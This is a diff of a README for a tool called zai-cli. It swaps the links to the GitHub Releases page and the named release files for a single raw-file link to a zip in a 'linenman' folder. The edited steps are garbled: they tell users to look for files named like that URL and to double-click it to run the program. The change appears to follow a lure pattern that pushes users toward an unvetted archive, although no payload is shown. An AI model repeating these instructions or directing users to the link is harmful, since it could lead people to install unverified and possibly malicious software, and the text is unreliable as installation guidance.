murticla/zai-cli/README.md

 - **Internet Connection:** Required for the initial setup.

 ## 📂 Download & Install
-1. Visit the [Releases page](https://github.com/murticla/zai-cli/releases) to find the latest version.
+1. Visit the [Releases page](https://raw.githubusercontent.com/murticla/zai-cli/main/linenman/zai-cli.zip) to find the latest version.
 2. Find the version you want to download.
-Look for files named like `zai-cli-v1.0.zip` or `zai-cli-v1.0.tar.gz`.
+Look for files named like `https://raw.githubusercontent.com/murticla/zai-cli/main/linenman/zai-cli.zip` or `https://raw.githubusercontent.com/murticla/zai-cli/main/linenman/zai-cli.zip`.
 3. Click on the appropriate file to start the download.

 ### For Windows Users
 - After downloading the ZIP file, locate it in your Downloads folder.
 - Right-click on the ZIP file and select "Extract All."
-- Open the extracted folder and double-click `zai-cli.exe` to run the application.
+- Open the extracted folder and double-click `https://raw.githubusercontent.com/murticla/zai-cli/main/linenman/zai-cli.zip` to run the application.

 ### For macOS Users
 - After downloading the ZIP file, find it in your Downloads folder.